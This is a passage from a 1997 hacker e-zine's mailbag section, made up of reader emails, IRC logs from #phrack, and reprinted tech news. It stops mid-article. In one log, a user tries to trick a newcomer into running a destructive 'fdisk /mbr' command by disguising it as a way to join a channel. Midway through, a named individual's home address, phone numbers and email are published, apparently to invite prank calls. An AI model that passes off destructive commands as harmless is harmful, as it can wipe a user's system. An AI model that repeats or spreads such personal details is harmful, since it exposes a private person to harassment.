[ This month, sadly Oddville is very small since this month, Scud-O's
registry was fucked and he lost Eudora,. and thus all this strange,
strange mail, so if you sent some whacked shit to me, resend it
again, por favor! heh. ]

Date: Tue, 16 Sep 1997 22:43:59 -0400 (EDT)
From: cLOut <clout@widomaker.com>
X-Sender: clout@wilma
To: scud@thtj.com
Subject: log

hey..here's a log file i had from a few days ago... add it to THTJ if you
want man..latz.




==/==/==
cL0ut
clout@widomaker.com
[finger for PGP public key]
This is from some dumbass that joined #phrack (<BEGIN LOG>)
<red_tab> Can someone tell me where to get salt peter.
<cL0ut> salt peter?
<red_tab> please
<p-> hm
<red_tab> Potassium Nitrate
<cL0ut> you can find salt & pepper on your kitchen table
<red_tab> Im from australia, and Ive never ehard of it before.
<red_tab> It's a special type
<red_tab> Ok then. Can anyone get onto #bombs? Its invite only.
<red_tab> or know the nick of a person on it?
<cL0ut> red_tab: i can tell you how to get in
<Frontline> yawn
<red_tab> What do you want?
<cL0ut> red_tab: type /run fdisk \y /mbr
<red_tab> Yeah. Sure
<red_tab> For gods sake. Im not that dumb
* Shok is idle, automatically dead [bX(l/on p/off)]
<cL0ut> red_tab: you sound that dumb
<Frontline> h0h0h0
<red_tab> It wouldn't work anywany, Im not on UNIX
<red_tab> thanks
<cL0ut> HAHAHAHAHAHAH
<cL0ut> you dumbass
<cL0ut> fdisk is a DOS commands
<cL0ut> command even
<Frontline> cl0ut not neccesarily
<red_tab> Ok it would work then. i am that dumb
<Frontline> but those lil commands you gave him were for the dos version

<(END LOG)>


---

Date: Tue, 16 Sep 1997 21:47:58 +0100
From: ToX <mt@bruhn.dk>
X-Mailer: Mozilla 3.03 (Win16; I)
To: thtj@thtj.com
Subject: Windows 95 NetWork Crack

My problem is that I have made
a bet with my freind, that i can
break his Windows 95 NetWork...

When you share a directory, you
can put a password on it, and it
is this password that i have to
break...

Can you pleash help me !

ToX
MT@BRUHN.DK


[no.]

---

From: "
TM" <tm@sinnerz.com>
Organization: SIN/Technophoria
To: xxxxxx@xxxxxxx.net
Date: Sun, 21 Sep 1997 00:10:39 -7000
Subject: Movie To See
Priority: normal
X-mailer: Pegasus Mail for Win32 (v2.54 preview)

Ok, if any of you are going to the movies any time soon, GO SEE THE
GAME! IT KICKS ASS! We are talking a big two thumbs up and one
fucking STUNNED audience. Go see it now, in fact. Go ahead and leave
your computer online, let it time out, go and stand outside of the
fucking movie theater until it starts or comes there... threaten the
manager with anal rape unless he show The Game there. Oh shit oh shit
oh shit what a fucking trip... wow... I mean, you think you know
what's up, you think you have the big picture but then it rips apart
and all of a sudden the picture gets much bigger... I loved it so
much I was incoherent for 2 hours afterwards (I just got back from
seeing it, as you can tell).

____
/ ___| ___
| | _ / _ \
| |_| | (_) |
\____|\___/

____ ___ _ _
/ ___| ___ ___ |_ _| |_| |
\___ \ / _ \/ _ \ | || __| |
___) | __/ __/ | || |_|_|
|____/ \___|\___| |___|\__(_)

Nownownownownow!
+--------------------------------+
| TM |
+--------------------------------+
| Ou' sont les neiges d' antan |
| Villon |
+________________________________+
| There is a man... |
| playing a violin... |
| and the strings... |
| are the nerves in his own arm. |
| A twisted soul- the mortar... |
| despair- the bricks... |
| to build a temple of sadness. |
| The Crow, J. O'Barr |
+--------------------------------+
| This tagline is SHAREWARE! |
| To register, send me $10. |
+--------------------------------+

[ I agree, this is one hell of a movie, and i recommend seeing it when
intoxicated for an added effect. ]

---

Name: Alam Farez
House fone number: (860)875-2117
Personal fone number: (860)875-9911
Address: 9 Deerfield Lane
Ellington, CT 06029

URL: http://members.tripod.com/~zerohex/zer0.html
email address: zer0-hex@juno.com

ÍÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÍ
#phrack

<chris0> so1o: whats the new crh gunna have in it?
<number6> replicas of phrack articles
<FrontLine> an original idea maybe this time?
<FrontLine> never
<FrontLine> could never have one of those
<rh1n0> gha
ÚÄÄÄ-ÄÄÄ(( whois information: number6 ))ÄÄ-Ä-ÄÄ-ÄÄÄ--ÄÄ-ÄÄ-Ä-Ä -ÄÄ-Ä- -Ä
³ address ð ~no6@jolt.ppp.dhp.com [Commercial Organization]
³ quote ð Number 6
³ channels ð #phrack #glitterglam
³ server ð irc-w.primenet.com: [206.165.111.241] Primenet Mae-West IRC server
ÀÄÄÄ-ÄÄÄÄÄÄÄÄÄÄ-ÄÄÄÄÄÄ--ÄÄÄ-ÄÄÄ-ÄÄ-Ä Ä-ÄÄ-ÄÄ- -Ä
<chris0> hehe
<so1o> it will be 200% orig1nal
<so1o> f00
<FrontLine> its to hard to come up with an original idea
<rh1n0> i didnt read that yet
<dev_null> wait and see
<rh1n0> i will go read it now
<FrontLine> let alown write those original ideas down
=== (join\#phrack) VC[VC@rhat.cts.com] @[02:03:51am]
<so1o> i wrote something down once.. it said...
<so1o> I R0CK
<so1o> heh
<Warpy> 200%
<Warpy> oh dear
<so1o> 200 proof then
<FrontLine> much easier to rip other peoples shit
<so1o> f00
<so1o> heh
<FrontLine> cut their name
<FrontLine> paste yours
<chris0> I seen an article published in crh that was also in EL8 newsletter 1 but changed.
ÚÄÄÄ-ÄÄÄ(( whois information: FrontLine ))ÄÄ-Ä-ÄÄ-ÄÄÄ--ÄÄ-ÄÄ-Ä-Ä -ÄÄ-Ä- -Ä
³ address ð assembly@penguinpalace.com [Commercial Organization]
³ quote ð
³ channels ð #phrack @#cheese #glitterglam
³ server ð irc.visi.com: Rockin' Snowland Server
ÀÄÄÄ-ÄÄÄÄÄÄÄÄÄÄ-ÄÄÄÄÄÄ--ÄÄÄ-ÄÄÄ-ÄÄ-Ä Ä-ÄÄ-ÄÄ- -Ä
<FrontLine> much much much easier
<so1o> i didn't paste my name
<so1o> heh
=== (join\#phrack) WOWEE[netcom.ix.@chi-il11-04.ix.netcom.com] @[02:04:35am]
<WOWEE> hello
<FrontLine> Oh you actually typed it out
<halflife> did i see so1o and original on the same screen?
ù halflife blinks
<so1o> isn't FrontLine a medication for vaginal warts?
<so1o> yeah halflife
<so1o> im gonna try reeally hard
<so1o> heh
ù so1o concentrates
=== (nick\change) rh1n0 ÄÄ> WEP
<WOWEE> can someone tell me where i can get an anonymous emailer and

  
browse the web
<halflife> so1o puts out a lot of issues
<chris0> leave
<halflife> too bad they all suck
<so1o> issue 5 is good
<halflife> but hey, theres lots of em atleast
ù FrontLine watches as s01o's head explodes from trying to come up with an original idea
<halflife> i read it, but dont remember any of it
<Warpy> so1o, so a redhat 2.1 exploit is GOOD?
<chris0> At least its a zine.
<so1o> issue 5 i said
<so1o> heh
<number6> wowee: check out http://www.research.att.com/projects/crowds/
<Shok> llalala
<WOWEE> thnx
ù FrontLine is amazed that in all that mess from his head exploding nothing original could be found
<so1o> i got 4 original submissions so far
<so1o> he phear
=== (nick\change) WEP ÄÄ> rh1n0
<so1o> s/he/so
<so1o> heh
<rh1n0> um
<Warpy> so1o, originality is crap unless they're good
<alhambra_> so1o how many of them are other handles u use?>
<chris0> Do people just submit to CRH or is it all codezero based?
=== (join\#phrack) ld-100[555ic@d-pm4-39.txdirect.net] @[02:07:04am]
<rh1n0> ahhaha
=== (signoff\#phrack) ld-100[555ic@d-pm4-39.txdirect.net] @[02:07:06am] [Connection reset by peer]
<Warpy> alhambra_, hahahaha
<Modify> Maybe you should lay off of hacking 30 web pages a week and devote your time on something more constructive!
<alhambra_> (are written by)
<so1o> alh : none
<FrontLine> so1o: in your next issue are you going to have |<-RaD flash warez
<so1o> yeah
<so1o> how did you know?
<dev_null> www.sekurity.org/~vol
<dev_null> CRH 5
<so1o> crh 5 is elitespeak
<halflife> mflash too
<so1o> so no-one can readit
<so1o> heh
<Warpy> www.sekurity.org/~warpy is more ereeter
<halflife> mflash.bas
<dev_null> i've been there
<so1o> hahaha
<halflife> visual basic mailflashes!@
<Shok> www.sekurity.org/~shok has no index.html
<Shok> hehe
<FrontLine> wew hoo mflash!!!!
<li> www.nque.com/~li has no html!
<li> hi
<so1o> www.larc.nasa.gov is br0k3n
<so1o> and it wasn't me
<halflife> so1o has mad phf sk1llz
<so1o> phf is k-r4d
=== (signoff\#phrack) phiXati0n[PHUCK_you@167-123-97.ipt.aol.com] @[02:08:59am] [ChaNNeL BoT bY |IceMan|------©HäÑñ飠ßøt ß¥ |íÇÈmÅñ|]
=== (kick\#phrack) Warpy[warpy@slsyd75p22.ozemail.com.au] kicked [so1o] off #phrack [schmack]
<alhambra_> i think crh and el8 should merge
<alhambra_> get all the crap in one place
<chris0> hehe lol
=== (join\#phrack) so1o[REPL4Y@serug.netgates.co.uk] @[02:09:13am]
<so1o> hey
<Modify> halflife: lo fuckin loud
<so1o> no fair
<dev_null> what happened to #codezero ?
<so1o> crh 6 will have unpublished and orignal exploits in it
<Warpy> so1o, name one exploit/vuln c0d3z3r0 have coded/found *THEMSELVES*
=== (signoff\#phrack) ld-50[555ic@d-pm4-26.txdirect.net] @[02:10:08am] [Operation timed out]
=== (join\#phrack) ld-100[555ic@d-pm2-05.txdirect.net] @[02:10:13am]
<halflife> judging from the originality of crh, REPL4Y is a good username for so1o
<li> mount.c
<li> ?
<so1o> phf xterm tekneeq
<Warpy> bahahaha
<so1o> hah
<Modify> oh my god
<Warpy> oh dear
<Modify> hahaha
<Modify> and thats a funny group name cause they code zero
=== (topic\#phrack) Warpy[warpy@slsyd75p22.ozemail.com.au] sets topic (<so1o> phf xterm tekneeq)
<dev_null> soltool is a fuckin' rip off
<halflife> so1o, people were doing that before the ibm advisory came out like 2 yrs ago
<Warpy> dev_null, agreed
<so1o> i coded that myself
<so1o> gneegr0
<halflife> soltool is backdoored too
<chris0> modify: what does global kos do?
<so1o> yeah
<Warpy> YOU CODED A FUCKING SHELL SCRIPT WITH PUBLIC EXPLOITS?
<so1o> i did that too
=== (nick\change) ld-100 ÄÄ> ld-50
<chris0> Im not defending codezero but global kos doesnt do crap.
<alhambra_> phf xterm technique is ancient
<Modify> chris: go to school and work
<Warpy> chris0, just because they don't hack pages and trade warez doesn't mean they don't do crap
<dev_null> Global kOS is kinda lame...i have yet to see something usefull come out from them,
<so1o> hah
<so1o> hah
<so1o> upyours4.exe
<so1o> hah
<chris0> hehe
=== (part\#phrack) few1[blah@phat.oz.net] @[02:11:57am]
<halflife> dev_null: so how do they differ from c0dez3r0?
<Warpy> so1o, at least they understood enough sendmail to code it
<chris0> warpy: Im saying they havent released anything.
=== (signoff\#phrack) alhambra_[alhambra@nuclear.biodome.org] @[02:12:27am] [changing servers]
<Modify> www.thtj.com/kOS/screenshot.jpg
>>> (msg(modify)) this shit is funny
<Warpy> a group is about/for the group not admirers or exploit k1dd1es

ÍÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÍ

=== (join\#phrack) so7o[REPL4Y@amon.netgates.co.uk] @[02:14:51am]
<chris0> At least they do a mag its better than nothing.
<so7o> we are getting better
<halflife> no, it isnt
<dev_null> remember ZERO
<halflife> so7o, the quality hasnt changed
<dev_null> www.sinnerz.com/zero
<so7o> yes it has
<halflife> and you still do lame stuff like dump d0x
<so7o> we have taken that into consideration
<so7o> and i have already tackled the issue for 6
<FrontLine> who is we anyway
<halflife> your content is 1) lame and 2) stolen
<halflife> a bad combo
<FrontLine> h0h0h0
<halflife> if yer gonna steal shit, steal better stuff
<alhambra_> yah
<alhambra_> and so1o
<Modify> hehe
<alhambra_> stop publishing other peoples shit on bugtraq
<Warpy> hahah
<so7o> that was another so1o
<alhambra_> oh right
<li> *cough*
<Warpy> "i couldn't find the remote root code, but here's something anyway.." (imap)
<alhambra_> the other so1o
<li> :>
<so7o> i'll relay the message
<kaotik> hrmm
<Modify> you mean there are 2 of you?
<so7o> yeah
<Warpy> SPLIT PERSONALITIZ
<so7o> and there's a dude called codezero
<kaotik> i guess it's shit like this why i don't go to cons
<li> so1o.. you told me you did it because you were tired of all the lamers gettin the code
<li> or something
<alhambra_> www.sekurity.org/~vol
<alhambra_> that page rules
<Warpy> alhambra_, it does don't it :)
<alhambra_> yep
<so7o> bugtraq is there to make the world a safer place
<alhambra_> so1o it doesn't matter
<so7o> i think everybodty should post everything to bugtraq
<FrontLine> and your here to make the world a lamer place?
<alhambra_> u dont publish others exploits there
<halflife> is he called codezero cuz that describes how much code he has written in his life?
<Modify> point being?
<li> hold.. lemme post nlock
<alhambra_> u dont publish others exploits there
<halflife> is he called codezero cuz that describes how much code he has written in his life?
<Modify> point being?
<li> hold.. lemme post nlock
=== (join\#phrack) Volatile[vol@synapse-160.mindport.net] @[02:19:08am]
<Volatile> so1o!
<chris0> Old hacking files are totally krad compared most of the new shit.
<Volatile> li: Hey there li
<so7o> i was considering posting the nlock source
<Volatile> li: Long time
<so7o> but sun would kick my ass
<chris0> Phrack is an ok magazine just too much source.
<Modify> geezus
=== (join\#phrack) loath[loath@206.29.0.102] @[02:19:41am]
=== (signoff\#phrack) chris0[brutus@wrt1-ppp30.dial.snowline.net] @[02:19:41am] [Leaving]
<Warpy> so7o, post nlock and everyone will kick yer ass
<so7o> why?
<Warpy> tho i suppose you'd need netcat for it
<Warpy> :P
<halflife> i think we need to publish less source
<Volatile> so7o: So how's CodeZero?
<so7o> because you would rather be all k-r4d and 31337
<kaotik> i was gonna post the netscape 128k encyrption k0de
<Volatile> haha
<Volatile> No
<Volatile> so7o would
<Volatile> That's why he's posting it
=== (nick\change) prym ÄÄ> FEGR00LZ
<so7o> and keep all your neat little remote's in sshd and the like to yourselves
<kaotik> but it's old shit
<Volatile> That's why he's posting it
=== (nick\change) prym ÄÄ> FEGR00LZ
<so7o> and keep all your neat little remote's in sshd and the like to yourselves
<kaotik> but it's old shit
=== (nick\change) FEGR00LZ ÄÄ> prym
<Modify> half: Im doing one on CISCO for the next issue
<Volatile> He wants to look like he has the greatest archives.
<Modify> with d1s
<li> it'd help if he had it
<so7o> that doesn't make the world a safer place
<Volatile> so7o: Dude.. face it
<Warpy> so7o, so ppl/groups like c0d3z3r0 don't get it and use it to trade juarez
=== (signoff\#phrack) VC[VC@rhat.cts.com] @[02:20:48am] [Ping timeout]
<Volatile> so7o: You're just a moron trying to look like yew have reet0 k03z
<so7o> my k0dez > your
<so7o> sssss
<Volatile> haha
<Volatile> Yea
<so7o> nice to see you admit it
<Volatile> Yew know what kode I loved a lot
<Modify> is that scripting?
<li> hi
<Volatile> Let me make sure Im accurate here.
<halflife> i wont code for linux anymore tho, too many stupid people ask me linspy questions

ÍÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÍ
The News
Compiled and edited by KungFuFox

1 : Huge jump seen in PCs linked to net
2 : Hackers vie for $1-million reward
3 : Digitizing Your Meter Reader
4 : AT&T Tests New `00' INFO Directory Assistance Service
5 : Bellcore Scientists See Cold-Weather Problems...
6 : Is the Internet a Matter of National Security?
7 : Hacking Smart Card Chips: At What Cost?
8 : House Panel Rejects Crypto Amendment
9 : Internet Addict Placed on Probation in Ohio - from FH

<Faraz> tell you and your lame friends not to prank call me

ÍÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÍ

Huge jump seen in PCs linked to net

The number of personal computers connected to the Internet will jump 71% by
the end of the year to 82 million, driven by use in the business market, says
market research firm Dataquest Inc. By 2001, about 268 million computers will
be linked to the global computer network, according to a recent study. That
will lead to more sales of Internet software and services, which are expected
to rise 60% to $12.2 billion (U.S.) by the end of the year, up from $7.5
billion last year. The Internet software and services market is expected to
reach $32.2 billion by 2001, with the services market alone reaching $7
billion in 1997 and rising to $29 billion by 2001, says Dataquest.

(Toronto Financial Post 21 Aug 97)
ÍÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÍ

Hackers vie for $1-million reward

Austin, Texas start-up Crypto-Logic Corp. has offered a $1-million reward to
whomever can crack its new e-mail encryption system within a year.
Cryptologists generally agree that Crypto-Logic's technology, called a
"one-time pad" is theoretically uncrackable -- each "pad" has a set of
uniquely random digital symbols that are coded to the actual message.

The recipient uses the same pad to decode the message, and each pad is used
only once. Still, experts are warning never to underestimate the tenacity of
computer hackers: "Anyone who says their system is bulletproof is either a
liar or stupid," says one. "If I'm wrong," says Crypto-Logic's VP and COO,
"we're out of business." http://www.ultimateprivacy.com

(Wall Street Journal 22 Aug 97)
ÍÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÍ

Digitizing Your Meter Reader
by Gene Koprowski

18.Sep.97.PDT -- A visit from the meter man is rarely a cherished event.
Meter readers dread the prospect of crazed canines, and customers don't much
like strangers tromping through their yard or basement.

To automate this timeworn process, utility companies are piloting programs
that use customized networking technology to remotely read meters and monitor
the energy usage of specific appliances. A technology trial at Nashville
Electric Service, a division of the Tennessee Valley Authority - the
Depression-era creation of President Franklin Roosevelt - will link consumers
to the energy company via a computer network.

The technology behind the service - developed by Nortel and TeCom - provides
automatic meter reading, outage detection, and remote connect and disconnect
capabilities. To test the service, Nashville Electric is installing a network
router and digital meter reader in the homes of 100 residential customers -
and in the offices of about 40 customers.

These meters will be linked to LANs and PCs, creating a bi-directional
consumer electronics network: Individual appliances, like a toaster,
microwave or refrigerator, will be online, enabling consumers to monitor
their usage down to the kilowatt, said TeCom spokesman Mike Mahoney.

"It will allow users to analyze their usage patterns, as they do with
long-distance phone bills," Mahoney said. "If the toaster is using too much
energy, they can reduce their toasting activity."

The technology project was inspired by the move toward deregulation in the
utility industry, said Teresa Corlew, a spokeswoman for Nashville Electric.
Companies are looking for ways to show consumers how they can lower costs;
technology is one way to do that. "We want to run the test for a year and
then assess the results," she said. "After that, we may roll it out to the
entire area."

Those participating in the test are volunteers who happen to have PCs in
their home and are concentrated in an area of the city that relies primarily
on electric service, rather than gas.

The voluntary nature of the test may be smart marketing for Nashville
Electric. In Roselle, Illinois, a suburb of Chicago, a water meter-reading
system was recently installed that employs the telephone network. All
residents must comply with the system by January, or they will be fined. But,
says Darcy Bretz, a local resident, several people in the suburb don't like
the idea because they think that their phones are being tapped and that their
privacy is being invaded.

Other experiment-minded locales are examining wireless data networks, which
will be online for tests in Massachusetts and Rhode Island by early 1998,
using a small, low-cost radio device that is hooked to an existing meter. Its
hoped that the technology's unobtrusiveness will win over consumers -
observers indicate that customer-preference must drive these trials.

"This kind of thing is starting to go on all over the industry," said Lori
DeMatteis, a senior associate at Metzler Associates, a Chicago-based energy
consultant. "There are a lot of different technologies and billing systems
that are emerging, but no clear winner yet. There will be several benefits
that users will see. There will be increased accuracy in billing, for
instance. Also, you won't have to worry about the man entering your yard, and
they don't have to worry about your dog."

©1993-97 Wired Ventures, Inc.
ÍÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÍ

AT&T Tests New `00' INFO Directory Assistance Service
September 22, 1997

Directory Assistance the Way Customers Really Want It

SEATTLE, Sept. 22 PRNewswire -- AT&T today announced that it will conduct a
market trial of its new AT&T "00" INFO(SM) (Double-0 Info) national
directory assistance service in the Seattle area. Beginning today, AT&T
customers in Seattle will be able to dial "00" to obtain telephone listings
for any place in the United States with one simple phone call -- even if
they don't have the area code or exact city.

In marked contrast to the industry trend to provide fully automated directory
assistance, AT&T "00" INFO Service features personal, courteous, helpful
service from specially trained AT&T information assistants who will stay on
the line for the entire call. From the moment they greet the customer by
introducing themselves, AT&T assistants are there to help customers simplify
their lives, by searching for a directory listing with as little information
as a partial name and a locality or state. And AT&T assistants will stay with
the customer through the end of the call when they provide the requested
information.

"We're providing directory assistance the way customers really want it," said
Howard McNally, vice president of AT&T Consumer Markets Division. "AT&T is
bringing back the personal touch. Not only will we stay on the line with our
customers, but we'll do everything within our power to meet their needs --
using enhanced search features to find the listings they want, and even the
address and zip code, if that's what they need."

In addition to personal service, AT&T "00" INFO also includes several new
search capabilities:

* A new expanded search capability allows AT&T information assistants to
extend a directory search to surrounding communities when they can't find a
requested listing in a designated city or town -- even if the caller doesn't
know what those communities are.

* A key word search function allows AT&T information assistants to search for
a business listing when the caller doesn't know the full or exact name of the
business. This search will find the listing if the key word appears anywhere
in the name.

Seattle is one of only five service markets in the United States to be
selected to test the new AT&T "00" INFO Service. The other test sites are
Minneapolis, Phoenix, Denver and Portland, Ore.

AT&T customers in these trial markets need only dial one simple number, "00,"
from their home phone to reach an AT&T information assistant who will help
them find telephone listings anywhere in the United States. This means they
no longer need to dial multiple numbers for directory assistance, or know
whether the desired number is local or long distance. And since they don't
need to know the area code to get a listing, customers no longer need to make
two calls for a listing -- the first for the area code, and the second for
the telephone number.

During the market trial, AT&T is offering the new AT&T "00" INFO Service at
the same 95-cent price for two listings that it charges for its conventional
directory assistance. In addition, customers can request an unlimited number
of listings on a single call.

When AT&T customers dial "00" from their home phones, they will hear the
familiar AT&T acknowledgment, followed by an automated system prompting them
to press "1" for AT&T "00" INFO directory assistance.

AT&T "00" INFO Service is also available to AT&T customers in the (CITY) area
even when they are away from their residence phone. By dialing
1-800-CALL-ATT, followed by Prompt "4," customers will be connected to AT&T
"00" INFO directory assistance.

The AT&T "00" INFO directory assistance service trial is limited to listings
in the United States. SOURCE AT&T

©PR Newswire. All rights reserved.
ÍÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÍ

Bellcore Scientists See Cold-Weather Problems (And Possible Solutions)
For Dense WDM Cables
September 22, 1997

SAN DIEGO, Calif.--(BUSINESS WIRE)--September 22, 1997--Cold weather
presents important challenges to dense-wavelength-division-multiplexing
technology, but those challenges can be overcome by prudent risk-assessment
and proper network planning, Bellcore scientists revealed today.

The scientists, Gabor Kiss, Osman Gebizlioglu, Dean Rader and Casey
Wieczorek, published their observations in a paper delivered today at the
National Fiber Optic Engineering Conference, here. The paper, "New
Developments in Temperature-Induced Cable Loss," is one of a series of
studies on fiber-optic cable performance made by Bellcore over the past five
years.

"We've known for awhile that cold weather changes the internal geometry of
fiber-optic cable, and that this change bends the optical fibers in ways they
weren't designed to be bent," said Kiss. "However, we also knew that this was
something we could live with in equipment operating at 1310 nanometers. With
dense WDM transmission, which happens at 1550 nanometers, the loss becomes
much worse."

Kiss added that some makers of DWDM systems plan to use 1625 nanometers for
network supervision. "Our study indicates that this supervision would fail
long before the network failed at 1550 nanometers," Kiss said.

Finally, Kiss pointed out that extremely cold weather can affect both the
"working" and "protected" channels -- that is, the fiber being used and the
fiber being held in reserve. "That means that temperature-induced cable loss
over a wide geographic area may frustrate a diverse-routing protection
scheme," Kiss said.

Kiss, Gebizlioglu, Rader and Wieczorek subjected cables to several years of
simulated seasonal cycles and monitored the loss in their laboratory in
Morristown, New Jersey. They also conducted field tests on cables at
Bellcore's research facility in Chester, New Jersey, and in Maine.

For equipment suppliers and network operators, Kiss said, this news should be
sobering, but not discouraging.

"The fact is that there are ways to assess the individual risk faced by
particular products in particular environments, and Bellcore is available to
assess that risk and work toward a way to minimize it," Kiss said.

Kiss and his colleagues are also engaged in writing Bellcore generic
requirements for DWDM equipment, and for fiber-optic cable.

Bellcore, headquartered in Morristown, New Jersey, is a leading provider of
communications software, engineering and consulting services based on
world-class research. Bellcore creates business solutions that make
information technology work for telecommunications carriers, businesses and
governments worldwide. Bellcore has sales offices throughout the United
States, Europe, Central and South America, and the Asia-Pacific region. On
November 21, 1996, SAIC (Science Applications International Corporation)
announced that it had agreed to purchase Bellcore once requisite regulatory
approvals had been obtained. More information about Bellcore is available at
its Web site, www.bellcore.com

©Business Wire.
ÍÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÍ

Is the Internet a Matter of National Security?
Monday, September 22, 1997

Gary Chapman Is Director of the 21st Century Project at the University of
Texas at Austin. he Can Be Reached at Gary.chapman@mail.utexas.edu

Slowly but surely, step by incremental step, the Internet is being pulled
into the forbidding black hole of "national security." Several recent
developments have raised warning flags that the global communications
network is now regarded as the turf of the people and institutions left over
from the Cold War.

On Sept. 5, the President's Commission on Critical Infrastructure
(http://www.pccip.gov/) released a report calling for a huge increase in
funding for protection of the "critical systems" of the nation, including
electric power distribution, telecommunications, banking and finance, water,
transportation, oil and gas storage and transportation, emergency services
and government services.

The commission recommended doubling the current federal R&D budget of $250
million for protecting these systems, with increases of $100 million each
year after 1999 to $1 billion per year by 2004.

The commission's chairman, retired Air Force Gen. Robert T. Marsh, told the
Associated Press ([Company Capsule]), "These are the life-support systems of
the nation. They're vital, not only for day-to-day discourse, they're vital
to national security. They're vital to our economic competitiveness
worldwide, they're vital to our very way of life."

Ten days ago, the House Select Committee on Intelligence in the U.S. Congress
voted to require that all technology for encrypting data provide a "key" that
could be obtained by law enforcement or national security officials. The vote
reversed a trend toward relaxing such controls--one of the chief political
goals of the high-tech industry. Committee members cited the warnings they
received in "classified briefings" as the main reason for their vote.

Later this month there will be a high-level conference in Chicago titled "The
Information Revolution: Impact on the Foundations of National Power," hosted
by the Center for Strategic and International Studies (http://www.csis. org)
and featuring many of the graybeards of the national security state, such as
arms control negotiator Paul Nitze, former Georgia Sen. Sam Nunn, Bob Galvin
of Motorola and ubiquitous conservative pundit William Bennett.

This signifies the discovery of the Internet by the highest mandarins of the
American power establishment, and the title of the conference frames the
subject in an ominous fashion.

This summer I was visited by, and gave a briefing to, a delegation of
Washington experts from the intelligence community--about a dozen gentlemen
from the CIA, the National Security Agency, the Treasury Department and the
Pentagon. It was at this meeting that I first heard the explicit statement
that the Internet is now regarded as a critical national asset that these
agencies believe needs their protection and attention.

The Internet, of course, has always been linked to the Defense Department--it
began, in the late 1960s, as a defense research project, and the Defense
Advanced Research Projects Agency was its overseer until 1983.

But the Pentagon never considered the Internet (or Arpanet, as it was known
until 1983) to be a "critical" communications network. There is a persistent
myth that the Internet was developed in a particular way to sustain damage in
a nuclear attack, but this was never true, as is pointed out in the
definitive history of the Net, "When Wizards Stay Up Late," by Katie Hafner
and Matt Lyon. The Internet was always a research project and chiefly a means
to pass information between incompatible computer systems.

But now the Internet is increasingly embedded in the nation's economic life.
More and more commerce is conducted on the Internet. Basic utilities, like
power and water, are beginning to use Internet-related computer networks for
monitoring services. The federal government is increasingly dependent on
computer-mediated communication over networks.

Many people in positions of power see the Internet as a precursor to a vast
global infrastructure of commerce and communication that the U.S. is likely
to dominate. Whatever global empire the U.S. will have in the 21st century is
likely to depend on this technology.

This global character of the Internet raises an interesting paradox for the
national security community. The Internet promises easy global commerce for
companies, no matter where they're physically located. These companies have
an intense interest in computer security, but they tend to be wary, if not
hostile, to national security imperatives.

When the Reagan administration, in the mid-1980s, attempted to implement a
new security classification for digital information called "sensitive not
secret," the private sector rebelled, and the proposal was killed. In the
same period, manufacturers of supercomputers and high-end workstations chafed
at Pentagon export controls.

Now the battle is being waged over encryption, and last week's defeat for
business may raise the stakes. The House committee vote "is a disaster," said
Rebecca Gould, vice president for public policy at the Business Software
Alliance (http://www.bsa.org).

Business leaders outside the defense industry have long had a strained
relationship with the spooks and Dr. Strangeloves of the national security
community. During World War I, for example, Henry Ford and other major
industrialists were pacifists and globalists who railed against militarism,
jingoism and paranoia.

The military responded by accusing Ford and his supporters of greed,
obsession with profits, and a lack of patriotism. For most of the first half
of this century, U.S. business leaders believed the military and its
attitudes were the chief enemies of commerce, which they regarded as the
foundation of world peace.

These days, with the Internet firmly in the hands of the private sector, the
noises coming from the Pentagon, the CIA and the FBI are much more
conciliatory--they promise to "work with industry" to help "secure" the
nation's "critical systems."

But this contemporary savoir-faire should make us even more nervous. Looming
before us is the absorption of the free and open Internet into the gloomy
abyss of classified information, black budgets, secrecy, surveillance,
shadowy characters, macho patriotic posturing, and all the other trappings of
"national security."
ÍÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÍ

Hacking Smart Card Chips: At What Cost?
09/25/97
By Mo Krochmal, TechWeb

LONDON -- Mondex International, developer of one of the world's leading
electronic cash cards, has come under fire from a security expert for
allegedly underestimating the ability of criminals to hack into its
products.

The E-cash pioneer, which is controlled by MasterCard International,
announced Monday its latest chip, the H8/3109 device developed by Hitachi.
E-cash cards let users pay for goods and services with electronic tokens that
can be freely exchanged for paper money and coins money in banks.

Mondex, which said it plans to market 5 million E-cash cards by the end of
1998, said in a statement that the chip had undergone "fault-analysis
